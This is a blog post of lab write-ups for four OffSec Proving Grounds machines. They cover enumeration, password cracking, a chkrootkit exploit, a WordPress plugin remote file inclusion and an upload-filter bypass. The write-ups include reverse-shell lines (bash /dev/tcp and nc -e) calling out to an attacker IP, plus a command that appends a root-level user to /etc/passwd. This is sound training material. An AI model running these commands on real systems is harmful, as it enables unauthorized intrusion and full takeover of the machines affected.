Post

OffSec PG - Sunset Decoy, Vegeta1, Wpwn, Y0usef

Posted
PG Artwork
PG Artwork
By Tanishq Rupaal
7 min read

Sunset Decoy

Enumeration

Machine IP → 192.168.80.85

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.80.85

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 → Identified file save.zip

Web Scan

GoBuster scan → gobuster dir -u http://192.168.80.85 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

No results were listed.

Exploitation

Retrieved the zip file using curl http://192.168.80.85/save.zip --output save.zip.

The zip file is locked. Therefore, cracking with fcrackzip and rockyou password list gives the password as manuel. Extracting it gives the files passwd, group, hostname, shadow and sudoers from the /etc/ directory.

The users identified are root with bash and user 296640a3b825115a47b68fc44501c828 with restricted bash.

The shadow file contains the hashed password for the identified user. Therefore, sending the entry to john for cracking gives the credentials as 296640a3b825115a47b68fc44501c828:server. This can be used for sshing into the server.

The shell received is a restricted shell. Tries many things to escape from the shell. The only thing that worked was to append -t "bash" to the ssh command. This allowed the use of / in commands and therefore /bin/cat, which gives the user flag.

Privilege Escalation

PSPY can be run on the machine. This gives a number of processes running. By looking at the output, the process /bin/sh /root/chkrootkit-0.49/chkrootkit is being run for about 5 seconds every minute. This coincides with the AV scan being run using the honeypot binary in the user’s home directory.

Searchsploit lists a privilege escalation exploit. This exploit states that a file can be created by the name update and made executable. It will be executed by chkrootkit whenever it is run. The file must be placed under the /tmp/ directory.

Therefore, a reverse shell code can be inserted into the file → /bin/bash -i >& /dev/tcp/192.168.49.80/3002 0>&1.

After a minute, a reverse shell is obtained as root. This gives the root flag.

Vegeta1

Enumeration

Machine IP → 192.168.72.73

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.72.73

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.72.73 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • img/ (301)
  • image/ (301)
  • admin/ (301)
  • manual/ (301)
  • server-status (403)
  • bulma/ (301)

The robots.txt was checked manually during the scan was running. Robots file reveals a directory called find_me. This doesn’t contain any useful information either.

Exploitation

None of the directories were really useful. The login pages inside the /admin/ directory were empty. The /bulma/ directory revealed an audio file in the wav format.

Uploading the wav file to an online audio decoder shows that the audio is morse code and the text states the presence of a user trunks with a password u$3r. This can be used to login to the ssh server running at the target. This gives us the user flag.

Privilege Escalation

Enumerating for sudo and setuid binaries on the file system, there was no finding apart from the presence of the setuid binary su. Looked at the bash rc and history files. The history file contained the following interesting entries →

1
2

perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd

Checked the permissions of the /etc/passwd file and indeed the user Trunks owned the file. This allowed direct manipulation of the file. Therefore, added the above entry to the passwd file. Then logged in as Tom using the password that was encrypted in the above commands.

This gave the root shell and thereby the root flag.

Wpwn

Enumeration

Machine IP → 192.168.80.123

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.80.123

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.80.123 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Directories/files listed →

  • index.html
  • wordpress/

Running gobuster again for the wordpress directory gives additional results →

  • index.php
  • wp-content/
  • wp-login.php
  • wp-includes/
  • readme.html
  • license.txt
  • wp-trackback.php
  • wp-admin/
  • xmlrpc.php
  • wp-signup.php

The folders indicates that an instance of wordpress is running on the web server. Running wpscan on the webserver using the docker image by docker run -it --rm wpscanteam/wpscan --url http://192.168.80.123/wordpress/ gives the following info →

  • Directory listing enabled at /wordpress/wp-content/uploads/
  • WP-Cron enabled at /wordpress/wp-cron.php
  • Wordpress version 5.5 using generator tag at /wordpress/index.php/feed/
  • Wordpress theme version 1.5 (latest is 1.8)
  • User admin identified at /wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
  • Outdated plugin Social Warfare 3.5.2 (latest is 4.3) identified at /wordpress/wp-content/plugins/social-warfare/readme.txt

Exploitation

RFI and RCE

Using searchsploit to search for social warfare gives the result as an RCE for versions < 3.5.3. Looking at the exploit, it needs a payload url to know the payload (an RFI). This will be included in /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=<RFI_URL>.

Reverse shell

Visiting this page would give the result of the command in the payload url. The payload must be of the form →

<pre>system('whoami')</pre>. Checking the existence of netcat and bash, a new payload can be used for a reverse shell → nc -e /bin/bash 192.168.49.80 3002. This grants the user flag.

Privilege Escalation

User

The users discovered from the reverse shell as www-data are root and takis. Looking through the config of wordpress in wp-config.php, a DB_password is found. This could be used for the takis user on ssh. This works and a user shell is obtained.

Root

The takis user is able to run sudo without a password for all commands. Therefore sudo su grants the root shell as well as the root flag.

Y0usef

Enumeration

Machine IP → 192.168.244.138

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.244.138

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.10 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.244.138 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.php
  • icons/ (403)
  • administration/ (403)

Exploitation

Without much information from the web scan, the possibility to look at headers was apparent. Adding the X-Forwarded-For: 192.168.244.138 header allows loading of the internal /administration/ directory. The header needs to be added to all subsequent requests via burp intercept.

This directory has a login page which does not have SQLi type injections, however, default credentials of admin:admin work. The dashboard of the application gives the ability to upload a file, list users or log out. The .../users page does not list any useful information.

Note: There was a spelling error in the links, which needed to be modified to get correct response.

The interesting part was the upload functionality. It could be used to upload a reverse shell. However, the application does not directly allow php files. Bypassing this was checked by renaming the file and adding image headers to the content, but it didn’t work.

The thing that worked was modifying the Content-Type header to image/gif. This allowed the upload of the reverse shell along with the path of the uploaded file. Navigating to the file grants a shell as the www-data user over netcat. This also gives the user flag.

Privilege Escalation

User

Enumerating the /etc/passwd file, the users of importance are root, yousef and speech-dispatcher. The /home/ directory contains a file user.txt file which has a base64 encoded string c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=.

Decoding this gives the credentials yousef:yousef123. Using this with ssh gives the shell as user yousef.

Root

Checking the sudo -l capabilities of yousef, it shows that yousef may run any command as root using sudo. Therefore, sudo su grants the root shell and thus, the root flag.

Lab Practice Notes, OffSec Proving Grounds
oscp lab offsec-proving-grounds
This post is licensed under CC BY 4.0 by the author.